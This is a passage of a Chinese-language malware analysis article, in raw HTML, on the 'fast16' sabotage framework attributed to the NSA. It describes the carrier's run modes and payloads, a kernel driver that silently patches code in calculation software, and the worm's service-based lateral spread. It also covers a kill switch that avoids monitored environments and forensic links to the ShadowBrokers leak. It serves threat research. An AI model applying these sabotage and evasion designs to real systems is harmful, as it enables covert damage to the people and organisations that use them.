1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">扩展模块</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">功能描述</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">wstring模块</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">原生Unicode字符串处理能力</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">内置对称加密器</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">解密嵌入的加密数据载荷</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Windows NT绑定模块</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">直接调用文件系统、注册表、服务控制、网络API</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">载体采用三种运行模式，通过命令行参数切换：直接运行启动Windows服务；</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">-i</span></code><span leaf="">参数安装服务并执行Lua代码；</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">-r</span></code><span leaf="">参数直接执行Lua代码；其他参数则进入代理/包装模式。这种灵活的设计使同一二进制文件能够适应多种作战环境。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">载体内部存储三个独立有效载荷：加密Lua字节码（负责配置和协调逻辑）、辅助DLL模块（ConnotifyDLL）、以及内核驱动文件（fast16.sys）。这种分离式架构实现了&#34;稳定外壳+动态载荷&#34;的设计目标，允许攻击者在不更换载体的情况下更新攻击能力。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">内核驱动程序：fast16.sys</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">fast16.sys</span></strong><span leaf="">是该破坏框架的核心恶意组件，编译时间为2005年7月19日，文件大小44,580字节。作为启动型（boot-start）文件系统驱动，该模块在存储栈中占据关键位置，能够拦截和修改从磁盘读取的可执行代码。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该驱动的技术实现具有开创性意义。它并非简单的文件感染或注册表持久化工具，而是实现了</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">基于规则的代码修补功能</span></strong><span leaf="">。具体而言，fast16.sys会在高精度计算软件运行时拦截其代码执行流，在内存中注入修改后的指令，导致计算结果出现系统性偏差。这种攻击方式精度极高，能够在神不知鬼不觉的情况下持续输出错误结果，适用于需要长期潜伏且不易被察觉的破坏性任务。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该驱动在2005年针对当时主流的Windows版本设计，无法在Windows 7及更高版本系统运行。尽管如此，其设计理念——通过内核级文件系统过滤实现代码篡改——代表了当时顶级网络攻击能力的巅峰。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">蠕虫传播机制</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">fast16框架集成了自我传播能力，是已知最早的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Lua-based网络蠕虫</span></strong><span leaf="">。载体模块设计为可携带多个&#34;蠕虫模块&#34;（内部代号&#34;wormlets&#34;），本次发现的样本中包含一个服务控制管理器（SCM）蠕虫模块。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">蠕虫传播流程如下：首先读取配置信息，确定载荷路径、服务配置和目标IP范围；将配置值转换为宽字符字符串以适配C层调用；提权后将载体安装为名为&#34;SvcMgmt&#34;的Windows服务并启动；根据配置决定是否部署内核驱动fast16.sys；最后释放蠕虫模块进行横向扩散。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该传播机制与同时代的大规模网络蠕虫（如SQL Slammer、Blaster等）形成鲜明对比。后者追求快速扩散，往往携带无意义的破坏载荷；而fast16的蠕虫模块专门针对特定目标环境设计，体现出国级攻击行动的精准性和克制性。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">规避与反检测机制</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">fast16展现出对目标环境的高度警觉性。载体内建</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">终止开关机制</span></strong><span leaf="">（Kill Switch），能够检测安全产品的运行特征，在识别到受监控环境时拒绝部署。这种设计确保攻击行动不会暴露于安全研究人员的分析环境中，最大程度保护行动的安全性。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结合ShadowBrokers泄露文件中的信息，fast16还内置了</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">去冲突签名</span></strong><span leaf="">机制。NSA操作人员通过&#34;Territorial Dispute&#34;组件对已知植入物进行标记，避免与其他国家级攻击行动产生冲突。这一设计揭示了网络空间中国家间攻防博弈的隐秘一角——多个国家级黑客团队在同一目标网络中活动，需要相互识别和规避。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">ShadowBrokers关联与技术溯源</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">泄露事件回溯</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2017年4月，名为ShadowBrokers的黑客组织公开泄露了据称来自美国国家安全局（NSA）的网络攻击工具库。其中一份关键文件</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">drv_list.txt</span></strong><span leaf="">引起了安全研究人员的注意——这是一份约250KB的驱动程序名称列表，用于标记NSA植入物为&#34;友好&#34;或需要&#34;撤回&#34;，以避免与竞争对手的国级攻击行动冲突。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">在这份列表中，</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">&#34;fast16&#34;</span></strong><span leaf="">赫然在列，对应的规避指令为：</span></p><blockquote><p><span leaf="">&#34;fast16 Nothing to see here – carry on &#34;</span></p></blockquote><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这一指令的含义明确：当操作人员发现目标系统存在名为fast16的驱动程序时，应将其视为己方植入物并绕过，而非触发反制措施。这直接证实了NSA曾使用该工具进行过实际网络攻击行动。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">取证链路确认</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">本次分析的关键突破在于SentinelLABS在svcmgmt.exe二进制文件中发现的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">PDB路径字符串</span></strong><span leaf="">：</span></p><pre style="overflow-wrap: break-word;word-break: break-all;white-space: pre-wrap;max-width: 100%;color: rgb(43, 48, 59);font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">C:\buildy\driver\fd\i386\fast16.pdb</span></code></pre><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这一看似普通的编译产物路径，实际上揭示了fast16.sys与svcmgmt.exe之间的内在联系。该路径指向一个内核驱动项目，其命名与NSA泄露文件中的&#34;fast16&#34;完全吻合。通过这条取证链路，我们将2017年的泄露事件与2005年编译的恶意软件样本建立了直接关联，证实了NSA在2005年即已掌握并部署了该破坏框架。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">APT组织归因与战术演进分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">嵌入式Lua VM战术的传承</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">观察到一个显著的技术特征是：</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">多个顶级APT组织均采用嵌入式Lua虚拟机作为恶意软件框架的核心组件</span></strong><span leaf="">。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">经过系统梳理，采用相同架构的APT组织和恶意软件家族包括：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">APT组织/恶意软件</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">首次发现时间</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">Lua VM应用特点</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">fast16</span></strong></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2005年</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">载体模块嵌入Lua 5.0，支持动态载荷加载</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Flame</span></strong></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2012年</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">模块化Lua引擎，支持加密指令下发</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">PlexingEagle</span></strong></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">约2012年</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">与Flame相关联的恶意组件</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Animal Farm - Bunny</span></strong></td><td 